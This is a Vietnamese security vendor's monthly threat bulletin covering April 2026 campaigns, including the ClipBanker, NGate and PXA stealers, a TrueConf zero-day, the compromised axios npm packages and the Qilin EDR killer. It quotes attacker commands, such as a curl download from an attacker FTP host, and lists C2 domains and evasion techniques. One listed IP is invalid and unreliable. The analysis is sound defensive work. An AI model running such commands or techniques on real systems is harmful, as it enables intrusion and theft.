THÔNG TIN CÁC MỐI ĐE DỌA BẢO MẬT THÁNG 04 – 2026

Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs

1. CÁC MỐI ĐE DỌA NÂNG CAO – ADVANCED THREATS

Trong tháng 04/2026, đội ngũ NCS ghi nhận các chiến dịch tấn công APT đáng chú ý sau:

STT Tên chiến dịch Mô tả
       1            Chiến dịch phát tán mã độc NotNullOSX Stealer nhắm mục tiêu vào khu vực Việt Nam – Khu vực: Việt Nam

– Mục tiêu: Đánh cắp thông tin.

– Công cụ/cách thức tấn công: Sử dụng các kỹ thuật social engineering nhằm đánh lừa người dùng thực thi mã độc, kết hợp nhiều phương thức phát tán khác nhau để tăng khả năng lây nhiễm. Sau khi xâm nhập thành công, mã độc thiết lập quyền truy cập cần thiết trên hệ thống và triển khai các cơ chế thu thập dữ liệu

       2            Chiến dịch tấn công phát tán mã độc ClipBanker nhắm mục tiêu vào Việt Nam – Khu vực: Việt Nam

– Mục tiêu: Đánh cắp tiền trong ví điện tử.

– Công cụ/cách thức tấn công: Kẻ tấn công tận dụng GitHub để phát tán phần mềm Proxifier giả mạo, đánh lừa người dùng thực hiện tải file. Sau khi chạy, mã độc sẽ thêm một exception trong Microsoft Defender nhằm tránh bị phát hiện. Sau đó thực hiện nhiệm vụ giám sát clipboard để tìm các chuỗi trông giống địa chỉ ví tiền điện tử Blockchain khác nhau rồi thay thế chúng thành địa chỉ của kẻ tấn công

       3            Chiến dịch tấn công phát tán mã độc NGate nhắm mục tiêu vào khu vực Việt Nam – Khu vực: Việt Nam.

– Mục tiêu: Người dùng thiết bị Android nhằm đánh cắp dữ liệu thẻ và mã PIN.

– Công cụ/cách thức tấn công: Ban đầu kẻ tấn công triển khai ứng dụng giả mạo và dụ giỗ nạn nhân tải xuống. Sau khi cài đặt, ứng dụng yêu cầu thanh toán NFC mặc định. Ứng dụng yêu cầu nạn nhân nhập mã PIN thẻ thanh toán và chạm thẻ vào mặt sau thiết bị để đọc dữ liệu NFC nhằm thu thập đầy đủ thông tin cần thiết phục vụ cho hành vi gian lận.

       4            Chiến dịch tấn công phát tán PXA Stealer tới từ tác nhân tại Việt Nam – Khu vực: Việt Nam.

– Mục tiêu: Đánh cắp dữ liệu cá nhân.

– Công cụ/cách thức tấn công: Giai đoạn đầu kẻ tấn công tận dụng LinkedIn để phát tán thông tin tuyển dụng giả mạo thông qua các tài khoản bị xâm nhập, mạo danh cơ hội việc làm hợp pháp nhằm dụ dỗ nạn nhân. Sau đó kẻ tấn công thực hiện dẫn dắt nạn nhân thực hiện tải tệp Zip chứa mã độc. Khi nạn nhân tải về và giải nén, mã độc sẽ thiết lập cơ chế persistence thông qua scheduled task dưới tiến trình hợp pháp của Microsoft Edge.

       5            Chiến dịch tấn công nhắm mục tiêu vào các tổ chức chính phủ tại khu vực Đông Nam Á – Khu vực: Đông Nam Á

– Mục tiêu: Nhắm vào các tổ chức chính phủ.

– Công cụ/cách thức tấn công: Kẻ tấn công phát tán liên kết tải ứng dụng TrueConf. Sau khi nạn nhân cài đặt, kẻ tấn công thay thế gói cập nhật bằng một phiên bản đã được vũ khí hóa và xâm nhập đến máy của nạn nhân. Sau khi xâm nhập thành công, kẻ tấn công thực hiện các hành động như trinh sát, persistence và tải xuống các payload bổ sung.

       6            Chiến dịch tấn công phát tán mã độc RustDesk thông qua MSTeams giả mạo – Mục tiêu: Giành quyền truy cập vào máy của nạn nhân

– Công cụ/cách thức tấn công: Kẻ tấn công giành quyền truy cập thông qua nạn nhân tải phần mềm Microsoft Teams trên trang web độc hại. Phần mềm giả mạo chứa mã độc RAT giúp kẻ tấn công toàn quyền truy cập vào máy của nạn nhân.

       7            Chiến dịch tấn công phát tán mã độc thông qua thư viện Axios bị xâm nhập. – Mục tiêu: Phát tán mã độc.

– Công cụ/cách thức tấn công: Kẻ tấn công chiếm được tài khoản maintainer chính của axios và thay đổi email liên kết, sau đó sử dụng CLI để publish 2 phiên bản của axios. Trưóc khi phát hành các bản axios độc hại, kẻ tấn công chuẩn bị sẵn một gói độc hại trên npm nhằm giả mạo crypsrcipt

to-js thật, chứa hook postinstall, triển khai cơ sẵn tự xóa dấu vết.

Thông tin chi tiết các chiến dịch:

1.1. Chiến dịch phát tán mã độc NotNullOSX Stealer nhắm mục tiêu vào khu vực Việt Nam

NCS Threat Intelligence theo dõi và ghi nhận bài đăng trên không gian mạng mô tả về một loại mã độc đánh cắp thông tin mới trên macOS có tên notnullOSX, được phát triển bởi một tác nhân đe dọa có tên 0xFFF. Được phát hiện vào cuối tháng 3 năm 2026, mã độc dạng module này được viết bằng Go và được thiết kế đặc biệt để đánh cắp tiền từ các ví tiền mã hóa có giá trị lớn nhắm mục tiêu vào người dùng tại các quốc gia: Việt Nam, Đài Loan và Tây Ban Nha.

Chuỗi tấn công

Chiến dịch tấn công sử dụng các kỹ thuật social engineering nhằm đánh lừa người dùng thực thi mã độc, kết hợp nhiều phương thức phát tán khác nhau để tăng khả năng lây nhiễm. Sau khi xâm nhập thành công, mã độc thiết lập quyền truy cập cần thiết trên hệ thống và triển khai các cơ chế thu thập dữ liệu. Với kiến trúc dạng module, malware có khả năng đánh cắp nhiều loại thông tin nhạy cảm và duy trì hoạt động một cách âm thầm trên máy nạn nhân.

Cụ thể, trong chiến dịch notnullOSX, kẻ tấn công sử dụng giao diện Google Docs giả mạo để dẫn dụ nạn nhân và triển khai hai hướng lây nhiễm chính là ClickFix và file DMG độc hại. Cả hai phương thức đều dẫn đến việc thực thi script cài đặt, tải xuống file Mach-O và thiết lập cơ chế persistence thông qua LaunchAgent.

Chuỗi ClickFix sau khi giải mã là script bash cài đặt mã độc.

Sau khi thực thi ban đầu, installer đóng gói mã độc dưới dạng ứng dụng chạy ẩn không hiển thị trên menu bar hay Dock, đồng thời dụ người dùng cấp quyền Full Disk Access. Nhờ đó, mã độc có thể vượt qua cơ chế bảo vệ của hệ thống và truy cập trái phép vào các dữ liệu nhạy cảm như cookie trình duyệt, thông tin đăng nhập, Apple Notes và tin nhắn mà không bị cảnh báo.

Hạ tầng phát tán sử dụng ứng dụng hình nền động giả mạo được phân phối qua các domain lừa đảo, kết hợp với các kênh YouTube lâu năm bị chiếm quyền để tránh bị phát hiện. Payload chính là một backdoor Mach-O được viết bằng Go và được obfuscate mạnh. Sau khi hoạt động, mã độc thiết lập cơ chế điều khiển từ xa dạng module, tải các thành phần chức năng từ CDN hợp pháp, lưu tạm và thực thi theo từng bước.

The wallpapermacos download được đánh giá là có chứa mã độc

Mã độc sử dụng kiến trúc module để thu thập dữ liệu nhạy cảm trên macOS, bao gồm thông tin đăng nhập trình duyệt, dữ liệu Telegram, khóa SSH và các thông tin liên quan đến developer. Ngoài ra, nó còn có khả năng trích xuất nội dung từ Apple Notes bằng cách giải nén và xử lý dữ liệu nội bộ.

CryptoWalletsGrab download.

Mã độc sử dụng module ReplaceApp để thay thế ứng dụng ví tiền mã hóa hợp pháp bằng phiên bản trojan hóa nhằm đánh cắp seed phrase. Đồng thời, nó duy trì kết nối C2 liên tục thông qua Firebase Realtime Database, sử dụng cơ chế giao tiếp hai chiều để nhận lệnh, tải module động và gửi kết quả thực thi dưới dạng lưu lượng web hợp lệ.

Hex dump của yêu cầu POST tới Firebase outbox hiển thị kết quả module

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

1.2. Chiến dịch tấn công phát tán mã độc ClipBanker nhắm mục tiêu vào Việt Nam

NCS Threat Intelligence theo dõi và ghi nhận bài đăng trên không gian mạng mô tả về một chiến dịch tấn công phát tán mã độc ClipBanker thông qua Proxifier nhằm đánh cắp tiền điện tử của nạn nhân tại khu vực châu Á, trong đó có Việt Nam.

Chuỗi tấn công

Giai đoạn ban đầu, kẻ tấn công tận dụng GitHub để phát tán phần mềm Proxifier giả mạo, đánh lừa người dùng thực hiện tải file.

Chuỗi tấn công

Khi nạn nhân chạy proxifier.exe, mã độc sẽ thêm một exception trong Microsoft Defender nhằm tránh bị phát hiện. Đầu tiên mã độc thực hiện tạo tệp prof Proxifier???.tmp và thực thi. Sau đó, một ứng dụng .NET có tên “api_updater.exe” được đưa vào để xử lý các exception của Microsoft Defender.

Sau khi các exception được thiết lập, proxifier.exe sẽ giải nén và cài đặt Proxifier hợp pháp. Mã độc thực hiện tạo một tiến trình mới, load module proxifierupdater.exe, khởi chạy tiến trình hợp pháp conhost.exe và đưa vào mộ ứng dụng .NET tên là bin.exe để thực thi tập lệnh PowerShell.

Tập lệnh PowerShell

Tập lệnh PowerShell thực hiện các hành động cụ thể sau:

  • Thêm tiến trình PowerShell và conhost vào exception trong Microsoft Defender.
  • Tạo một khóa đăng ký tại HKLM\SOFTWARE\System::Config và lưu trữ một tập lệnh PowerShell được mã hóa Base64 khác bên trong.
  • Thiết lập scheduled task để khởi chạy PowerShell với một tập lệnh PowerShell với một script khác làm đối số, nhằm đọc nội dung Registry, giải mã và gọi thực thi đoạn mã vừa tạo.
  • Ping dịch vụ IP Logger tại https[:]//maper[.]info/2X5tF5 giúp kẻ tấn công xác định được lây nhiễm đã thành công.

Giai đoạn tiếp theo được khởi chạy cùng với tác vụ được tạo trong Task Scheduler.

Tập lệnh PowerShell khác có nhiệm vụ tải xuống các script cho giai đoạn tiếp theo từ các địa chỉ được mã hóa cứng và thực thi. Các địa chỉ này thuộc về các dịch vụ dạng Pastebin với nội dung được mã hóa theo nhiều cách khác nhau cùng một lúc.

Tập lệnh được giải mã và gỡ rối mã từ khóa đăng ký Config

Tập lệnh từ Pastebin tiếp tục hành vi tải xuống payload từ GitHub

Tập lệnh được giải mã từ Pastebin

Sau khi giải mã và deobfuscated, nhận được một script thực hiện trích xuất Shellcode và chuỗi base64, khởi chạy fontdrivhost.exe, đưa shellcode vào tiến trình. Shellcode sẽ thực hiện giải nén và load payload ở giai đoạn cuối cùng, có nhiệm vụ giám sát clipboard để tìm các chuỗi trông giống địa chỉ ví tiền điện tử Blockchain khác nhau rồi thay thế chúng thành địa chỉ của kẻ tấn công.

Tập lệnh sau khi được giải mã

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

1.3. Chiến dịch tấn công phát tán mã độc NGate nhắm mục tiêu vào khu vực Việt Nam

NCS Threat Intelligence theo dõi và ghi nhận bài đăng trên không gian mạng mô tả về một chiến dịch phát tán mã độc NGate, lợi dụng ứng dụng thanh toán NFC HandyPay để đánh cắp dữ liệu thẻ và mã PIN, qua đó thực hiện các hành vi gian lận tài chính. Chiến dịch chủ yếu nhắm mục tiêu vào người dùng thiết bị Android trong đó có khu vực Việt Nam thông qua các kịch bản lừa đảo và phân phối ứng dụng ngoài nguồn chính thống.

Chuỗi tấn công

Nhóm tấn công phát tán biến thể NGate thông qua website xổ số giả mạo “Rio de Prêmios” và trang Google Play giả cho ứng dụng “Proteção Cartão”. Nạn nhân bị dụ tải và cài đặt ứng dụng HandyPay đã bị cài cắm mã độc từ nguồn ngoài, sau đó được yêu cầu đặt làm ứng dụng thanh toán NFC mặc định.

Chuỗi tấn công

Phân bố địa lý các khu vực và quốc gia bị ảnh hưởng

Khi tải xuống phần mềm HandyPay, Android mặc định chặn cài đặt và yêu cầu người dùng bật tùy chọn “Allow from this source”. Sau khi bật tùy chọn này, người dùng tiếp tục cài đặt ứng dụng như bình thường.

Sau khi cài đặt, ứng dụng yêu cầu được đặt làm ứng dụng thanh toán NFC mặc định. Tuy nhiên, ứng dụng không yêu cầu thêm bất kỳ quyền nào, giúp giảm mức độ nghi ngờ và dễ dàng vượt qua sự chú ý của người dùng.

HandyPay không yêu cầu quyền nào

Ứng dụng yêu cầu nạn nhân nhập mã PIN thẻ thanh toán và chạm thẻ vào mặt sau thiết bị để đọc dữ liệu NFC nhằm thu thập đầy đủ thông tin cần thiết phục vụ cho hành vi gian lận.

Mã độc lợi dụng chức năng của HandyPay để chuyển tiếp dữ liệu NFC tới thiết bị do kẻ tấn công kiểm soát. Thiết bị này được liên kết với địa chỉ email được hardcode trong ứng dụng, đảm bảo toàn bộ dữ liệu thu thập được gửi trực tiếp tới attacker. Trong khi đó, mã PIN được gửi riêng về máy chủ C&C thông qua giao thức HTTP.

Máy chủ C&C không chỉ dùng để thu thập mã PIN mà còn đóng vai trò là máy chủ phân phối ứng dụng độc hại, cho thấy hạ tầng tấn công được thiết kế tập trung nhằm phục vụ cả hai mục đích phát tán và thu thập dữ liệu.

Đánh cắp mã PIN đến máy chủ C&C qua giao thức HTTP

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

1.4. Chiến dịch tấn công phát tán PXA Stealer tới từ tác nhân tại Việt Nam

NCS Threat Intelligence theo dõi và ghi nhận bài đăng trên không gian mạng mô tả về một chiến dịch tấn công phát tán PXA Stealer thông qua LinkedIn, đánh cắp dữ liệu cá nhân trên toàn cầu tới từ tác nhân tại Việt Nam.

Chuỗi tấn công

Giai đoạn ban đầu, kẻ tấn công tận dụng LinkedIn để phát tán thông tin tuyển dụng giả mạo thông qua các tài khoản bị xâm nhập, mạo danh cơ hội việc làm hợp pháp.

Chuỗi tấn công

Kẻ tấn công thực hiện dẫn dắt nạn nhân thông qua một chuỗi phân phối nhiều tầng dựa trên các nền tảng đáng tin cậy, bao gồm Google Form, URL rút gọn và một tệp ZIP được lưu trữ trên Dropbox.

Khi nạn nhân tải về và mở tệp nén, một tệp nhị phân Microsoft Word giả dạng được thực thi, kích hoạt DLL Sideloading. Tệp DLL được phóng đại kích thước lên khoảng 100 MB nhằm bypass các quy trình quét tự động và các cơ chế kiểm tra giới hạn kích thước tệp.

File Word giả mạo thực thi một tập lệnh batch script, dùng để triển khai mã độc ở giai đoạn tiếp theo, đồng thời thiết lập cơ chế persistence thông qua task scheduled ngụy trang dưới tiến trình cập nhật hợp pháp của Microsoft Edge. Thành phần này sẽ thực hiện kích hoạt Infostealer nằm bên trong bộ nhớ.

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

1.5. Chiến dịch tấn công nhắm mục tiêu vào các tổ chức chính phủ tại khu vực Đông Nam Á

NCS Threat Intelligence theo dõi và ghi nhận bài đăng trên không gian mạng mô tả về một chiến dịch tấn công, khai thác lỗ hổng zero-day (CVE-2026-3502) trong ứng dụng TrueConfig, nhắm mục tiêu vào các tổ chức chính phủ tại khu vực Đông Nam Á.

Chuỗi tấn công

Giai đoạn tấn công bắt đầu khi ứng dụng TrueConf khởi chạy, từ một liên kết được gửi tới mục tiêu từ nhóm tấn công. Liên kết này khởi chạy ứng dụng TrueConf đã được cài đặt và hiển thị lời nhắc cập nhật phiên bản mới.

Sau khi nạn nhân thực hiện cài đặt, kẻ tấn công thay thế gói cập nhật trên máy chủ TrueConf on-premise bằng một phiên bản đã bị vũ khí hóa, đảm bảo rằng ứng dụng sẽ tải về tệp độc hại thông qua quy trình cập nhật bình thường.

Tệp độc hại tải xuống bao gồm các thành phần cài đặt hợp lệ của ứng dụng TrueConf bên cạnh đó là các tệp poweriso.exe và một tệp 7z-x64.dll độc hại vào đường dẫn C:\ProgramData\poweriso\, sau đó DLL độc hại được load thông qua cơ chế DLL side-loading.

Chuỗi tấn công

Sau khi xâm nhập thành công vào máy nạn nhân, kẻ tấn công thực hiện một loạt hành động như trinh sát, chuẩn bị môi trường, tạo persistence, và tải xuống payload bổ sung 7z-x64.dll.

Kẻ tấn công thực hiện các hành vi như:

  • Tasklist > cache
  • Tracert 8.8.8.8 -h 5
  • curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x update.7z -p <redacted>
  • reg add “hkcu\environment” /v path /t REG_SZ /d “C:\users\<redacted>\appdata\local\temp” /f c:\windows\system32\cmd.exe c:\windows\syswow64\iscsicpl.exe.

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

1.6. Chiến dịch tấn công phát tán mã độc RustDesk thông qua MSTeams giả mạo

NCS Threat Intelligence theo dõi và ghi nhận bài đăng trên không gian mạng mô tả về một chiến dịch tấn công phát tán mã độc RustDesk thông qua trình cài đặt Microsoft Teams, được ký bằng chứng chỉ giả mạo “Zlatin Stamatov” thông qua Certum.

Chuỗi tấn công

Kẻ tấn công giành được quyền truy cập ban đầu thông qua việc người dùng thực hiện tìm kiếm và tải công cụ cài đặt Microsoft Teams (MSTeamsSetup.exe) từ trang web độc hại.

Chuỗi tấn công của chiến dịch

File MSTeamsSetup.exe thực chất là bộ cài đặt RustDesk RAT, mã độc thực hiện kết nối tới C2 mon.systemautoupdater[.]com với ip 23.277.141[.]144, qua đó giúp kẻ tấn công có được toàn quyền truy cập vào máy bị lây nhiễm.

Ngoài ra chiến dịch còn sử dụng một trang mồi nhử (decoy) systemautoupdater[.]com hiển thị một trang placeholder của GoDaddy Website Builder bắt nguồn từ Philippines, cho thấy tác nhân có thể có liên hệ hoặc đang giả mạo hạ tầng tại Philippines.

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

1.7. Chiến dịch tấn công phát tán mã độc thông qua thư viện Axios bị xâm nhập

NCS Threat Intelligence theo dõi và ghi nhận bài đăng trên không gian mạng mô tả về một chiến dịch tấn công, chèn dependency ẩn vào axios, nhằm phát tán mã độc khi người dùng thực hiện npm install.

Chuỗi tấn công

Giai đoạn ban đầu, kẻ tấn công chiếm được tài khoản maintainer chính của axios, thay đổi email liên kết thành ifstap@proton.me, sau đó sử dụng CLI để publish thủ công 2 phiên bản axios@1.14.1 và axios@0.30.4 mà không qua quy trình CI/CD trên GitHub.

Trước khi phát hành các bản axios độc hại, kẻ tấn công chuẩn bị sẵn một gói độc hại trên npm: plain-crypto-js@4.2.1 được phát hành bởi tài khoản nrwise@proton.me, với mục đích:

  • Giả mạo crypto-js thật.
  • Chứa hook postinstall: node setup.js – script sẽ tự chạy trong quá trình npm install mà không cần bất kỳ thao tác nào từ người dùng.
  • Chuẩn bị sẵn cơ chế tự xóa dấu vết: bao gồm tệp package.md, để ghi đè package.json thật sau khi mã độc chạy xong.
Timestamp (UTC) Event
2026-03-30 05:57 Plain-crypto-js@4.2.0 được publish, chứa đầy đủ mã nguồn hợp lệ với mục đích thiết lập lịch sử phát hành trên npm, tránh việc gói bị nhận diện như một package không có lịch sử trong quá trình kiểm tra. Thông tin được dùng để đăng tải là địa chỉ nrwise@proton.me.
2026-03-30 23:59 Phiên bản Plain-crypto-js@4.2.0 được phát hành với một hook cùng với một dropper được obfuscated. Cơ chế thực thi được kích hoạt thông qua lệnh postinstall: node setup.js.
2026-03-31 00:21 Phiên bản axios@1.14.1 được chèn thêm một dependency thực thi ở runtime, phát hành thông qua tài khoản maintainer đã bị xâm phạm.
2026-03-31 01:00 Phiên bản axios@0.30.4 được phát hành với phương thức chèn mã độc tương tự
2026-03-31 ~03:15 Npm gỡ bỏ axios@1.14.1 và axios@0.30.4 ra khỏi registry.
2026-03-31 03:25 Npm kích hoạt security hold với plain-crypto-js, bắt đầu quá trình thay thế gói độc hại bằng placeholder ‘npm security-holder’.
2026-03-31 04:26 Npm phát hành gói security-holder plain-crypto-js@0.0.1- security.0 dưới tài khoản npm@npmjs.com, thay thế gói độc hại trên registry.

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

Khuyến nghị:

  • Thực hiện cập nhật các IoCs (mã hash, địa chỉ IP) vào các giải pháp bảo mật phía khách hàng nhằm nâng cao năng lực phòng thủ, giúp giám sát và phát hiện các dấu hiệu bất thường trên hệ thống

2. MALWARE

Tháng 04/2026, đội ngũ NCS ghi nhận các phân tích đáng chú ý về mẫu mã độc sau:

STT Tiêu đề Mô tả
1 Chiến dịch phát tán mã độc Desck VB NCS Threat Intelligence theo dõi và ghi nhận bài đăng trên không gian mạng mô tả về một chiến dịch tấn công, phát tán mã độc Desck VB RAT thông qua các file JavaScript độc hại, sử dụng kỹ thuật fileless execution giúp tránh né các cơ chế phát hiện truyền thống.
2 Phân tích EDR Killer trong chiến dịch ransomware của Qilin NCS Threat Intelligence theo dõi và ghi nhận bài đăng trên không gian mạng mô tả về hoạt động của nhóm ransomware Qilin sử dụng mã độc EDR Killer trong chuỗi tấn công, nhằm vô hiệu hóa các giải pháp bảo mật endpoint, tạo điều kiện cho các giai đoạn tấn công tiếp theo như triển khai ransomware và duy trì truy cập trong hệ thống mục tiêu. Mã độc được ghi nhận là có khả năng vô hiệu hóa hơn 300 EDR drivers trên thế giới.

2.1. Chiến dịch phát tán mã độc Desck VB

NCS Threat Intelligence theo dõi và ghi nhận bài đăng trên không gian mạng mô tả về một chiến dịch tấn công, phát tán mã độc Desck VB RAT thông qua các file JavaScript độc hại, sử dụng kỹ thuật fileless execution giúp tránh né các cơ chế phát hiện truyền thống.

Luồng hoạt động của mã độc

Tệp JavaScript được obfuscate nhiều lớp, sử dụng kỹ thuật tái tạo chuỗi động (dynamic string reconstruction) để tái tạo payload [T1027], sau đó truyền nội dung sang PowerShell để tiếp tục thực thi [T1059.001].

Tệp tin JavaScript độc hại bị mã hóa hoàn toàn

Thông qua script PowerShell ban đầu, mã độc tạo ra một payload PowerShell [T1059.001] bổ sung và bắt đầu thiết lập kết nối với domain [T1071]:

“andrefelipedonascime1768785037020.1552093[.]meusitehostgator[.]com[.]br”

Lệnh PowerShell thiết lập kết nối đến máy chủ của kẻ tấn công

Mã độc sử dụng kỹ thuật làm rối mã (Base64 encoding và reverse string) nhằm che giấu hạ tầng C2 hoặc nguồn tải, sau khi giải mã nhận được URL.

“https://pastebin.com/JO5odWV/0”

Lệnh PowerShell thực thi tệp tin “C:\Users\Public\xwgpv_01.ps1″, thực hiện kết nối tới domain (được mã hóa bằng base64) của kẻ tấn công, sau đó sử dụng InstallUtil.exe [T1218] để thực thi payload .NET độc hại. Payload được nạp trực tiếp vào bộ nhớ thông qua kỹ thuật .NET reflection [T1620] nhằm tránh ghi xuống đĩa.

Mã độc sử dụng các hàm được làm rối để che giấu hành vi, trong đó có thành phần giao tiếp mạng nhằm tải dữ liệu từ máy chủ C2.

Hàm prFVI bị làm rối để thực thi mã

Payload sau đó được thực thi thông qua cơ chế loader kết hợp kỹ thuật process injection [T1055], giúp nạp và chạy mã độc trực tiếp trong bộ nhớ mà không cần ghi xuống đĩa.

Hàm Execute thực hiện loader

Ngoài ra mẫu mã độc còn thực hiện một số kiểm tra môi trường nhằm phát hiện môi trường phân tích. Nếu phát hiện dấu hiệu bất thường, mã độc thực hiện hành vi phá hủy như khởi động lại hệ thống, nhằm gây khó khăn cho quá trình phân tích [T1497].

Cơ chế anti-sandbox

Payload cuối cùng tải xuống module Keylogger.dll để thu thập thông tin [T1056.001] và nạp các thông tin cấu hình vào bộ nhớ để thiết lập kết nối tới máy chủ điều khiển (C2). Tại runtime, ghi nhận các giá trị như domain (manikandan83.mysynology.net) và cổng (7535), phục vụ cho cơ chế giao tiếp với C2.

Domain và cổng mà keylogger.dll kết nối

Domain manikandan83.mysynology.net được xác định có liên quan đến hoạt động độc hại, phân giải tới địa chỉ IP 45.156.87.226 và sử dụng cổng 7535, nhiều khả năng đóng vai trò trong kênh liên lạc với máy chủ điều khiển (C2) của mã độc.

Kết nối tới domain độc hại

MITRE ATT&CK Mapping

Tactic ID Technique Name
Execution T1059.001 PowerShell
Defense Evasion T1027 Obfuscated Files of Information
Defense Evasion T1218 System Binary Proxy Execution
Defense Evasion T1620 Reflective Code Loading
Defense Evasion T1055 Process Injection
Command and Control T1071 Application Layer Protocol
Defense Evasion T1497 Virtualization/Sandbox Evasion
Credential Access T1056.001 Keylogging

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến mã độc

2.2. Phân tích EDR Killer trong chiến dịch ransomware của Qilin

NCS Threat Intelligence theo dõi và ghi nhận bài đăng trên không gian mạng mô tả về hoạt động của nhóm ransomware Qilin sử dụng mã độc EDR Killer trong chuỗi tấn công, nhằm vô hiệu hóa các giải pháp bảo mật endpoint, tạo điều kiện cho các giai đoạn tấn công tiếp theo như triển khai ransomware và duy trì truy cập trong hệ thống mục tiêu. Mã độc được ghi nhận là có khả năng vô hiệu hóa hơn 300 EDR drivers trên thế giới.

Chuỗi tấn công

Chuỗi lây nhiễm bắt đầu khi một ứng dụng hợp lệ bị lợi dụng để side-load DLL độc hại (msimg32.dll) [T1574]. DLL này kích hoạt mã độc ngay trong hàm “DllMain”, đồng thời chuyển tiếp các API hợp lệ để tránh bị nghi ngờ. Sau khi được nạp, payload được giải mã và thực thi trực tiếp trong bộ nhớ nhằm né tránh phát hiện[T1620].

Chuỗi tấn công

Chiến dịch sử dụng nhiều giai đoạn tấn công, bao gồm 4 giai đoạn chính:

  • Giai đoạn 1 – Loader: Chuẩn bị môi trường, bypass EDR.
  • Giai đoạn 2 – Decoder: Giải mã payload trong bộ nhớ và chuyển tiếp luồng thực thi.
  • Giai đoạn 3 – Hooking & Control: Thực hiện IAT hooking, điều khiển luồng thực thi và ẩn payload.
  • Giai đoạn 4 – EDR Killer: Nạp driver, vô hiệu hóa EDR ở cấp Kernel và loại bỏ các tiến trình bảo mật.

Giai đoạn 1 triển khai một PE loader phức tạp nhằm chuẩn bị môi trường thực thi và né tránh EDR. Loader sử dụng các kỹ thuật SEH/VEH để điều khiển luồng thực thi và áp dụng kỹ thuật syscall recovery[T1106] nhằm bypass các hook ở user-mode. Ngoài ra, mã độc còn tích hợp cơ chế anti-debug và geo-fencing để tránh phân tích.

Loader triển khai cơ chế chống debug bằng cách kiểm tra sự hiện diện của breakpoint trên hàm KiUserExceptionDispatcher[T1027]. Nếu phát hiện dấu hiệu phân tích, tiến trình sẽ chủ động crash. Việc kiểm tra được thực hiện trước khi cơ chế xử lý ngoại lệ bị sửa đổi, đảm bảo ngoại lệ được xử lý bởi handler mặc định và tránh lộ hành vi của mã độc.

Kỹ thuật anti-debug bằng breakpoint detection

Loader triển khai cơ chế geo-fencing bằng cách kiểm tra cấu hình ngôn ngữ của hệ thống. Nếu phát hiện môi trường thuộc danh sách loại trừ loader sẽ tự kết thúc.

Cơ chế geo-fencing dựa trên cấu hình ngôn ngữ hệ thống

Giai đoạn tấn công thứ 2 đóng vai trò như một lớp trung gian, thực hiện giải mã payload được lưu trong bộ nhớ [T1027] và dọn dẹp các vùng nhớ tạm trước đó. Sau khi hoàn tất, nó tiến hành hook Import Address Table (IAT) nhằm chuyển hướng các lời gọi API và thiết lập môi trường thực thi. Cuối cùng, luồng thực thi được chuyển sang Stage 3 để tiếp tục quá trình tấn công.

Giai đoạn tấn công thứ 2

Giai đoạn tấn công thứ 3 đóng vai trò thiết lập môi trường thực thi cho payload cuối. Tại đây, mã độc tiếp tục sử dụng cơ chế điều khiển luồng dựa trên VEH để làm rối quá trình thực thi. Đồng thời, nó thực hiện hook Import Address Table (IAT) [T1574] nhằm chuyển hướng các lời gọi API và kiểm soát hành vi của tiến trình. Ngoài ra, payload được ánh xạ vào vùng nhớ của các module hợp lệ [T1055], giúp tăng khả năng ẩn mình trước các giải pháp bảo mật. Sau khi hoàn tất, luồng thực thi được chuyển sang stage tiếp theo là thành phần EDR Killer.

Quá trình phân giải syscall và thực thi một số hàm nhất định.

PE file được giải nén từ bộ nhớ

Tại giai đoạn tấn công thứ 4, PE file được trích xuất từ giai đoạn 3 tương tự thực hiện các kĩ thuật kiểm tra hệ thống có thuộc danh sách loại trừ (Giai đoạn 1) và sẽ tự crash nếu thuộc danh sách loại trừ.

Mã độc tiến hành làm mù cơ chế giám sát của EDR bằng cách xóa hoặc vô hiệu hóa các callback ở cấp kernel [T1562.001] [T1014]. Các callback này thường được sử dụng để theo dõi các sự kiện như tạo tiến trình, tạo luồng hoặc nạp module. Việc loại bỏ các callback khiến EDR không còn khả năng ghi nhận và phân tích hành vi của tiến trình độc hại, từ đó làm suy giảm đáng kể hiệu quả phát hiện.

Cơ chế xóa callback giám sát của EDR ở cấp kernel

Mã độc sử dụng driver hợp lệ nhưng dễ bị khai thác (rwdrv.sys) theo kỹ thuật BYOVD nhằm thực hiện các thao tác ở cấp kernel [T1068]. Driver này cho phép truy cập trực tiếp vào bộ nhớ vật lý và phần cứng hệ thống từ user-mode mà không có kiểm soát bảo mật đầy đủ. Nhờ đó, mã độc có thể đọc/ghi bộ nhớ kernel [T1211], vô hiệu hóa các cơ chế bảo vệ và hỗ trợ việc chấm dứt các tiến trình EDR [T1562.001].

Ghi bộ nhớ kernel thông qua IOCTL của driver rwdrv.sys

Sau khi đã làm suy yếu cơ chế giám sát, mã độc tiếp tục sử dụng driver thứ hai (hlpdrv.sys) để chấm dứt các tiến trình liên quan đến EDR. Việc terminate được thực hiện ở cấp kernel giúp vượt qua các cơ chế tự bảo vệ của các sản phẩm bảo mật. Bước này hoàn tất quá trình vô hiệu hóa EDR, tạo điều kiện cho các hoạt động độc hại tiếp theo được thực thi mà không bị phát hiện.

Kết thúc tiến trình EDR thông qua driver hlpdrv.sys

MITRE ATT&CK Mapping

Tactic ID Technique Name
Persistence Privilege Escalation, Defense Evasion T1574 Hijack Execution Flow
Defense Evasion T1620 Reflective Code Loading
Defense Evasion T1027 Obfuscated Files or Information
Defense Evasion, Privilege Escalation T1055 Process Injection
Defense Evasion T1562.001 Disable or Modify Tools
Privilege Escalation T1068 Exploitation for Privilege escalation
Defense Evasion T1211 Exploitation for Defense Evasion
Persistence, Defense Evasion T1014 Rootkit
Execution T1106 Native API

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến mã độc

Khuyến nghị:

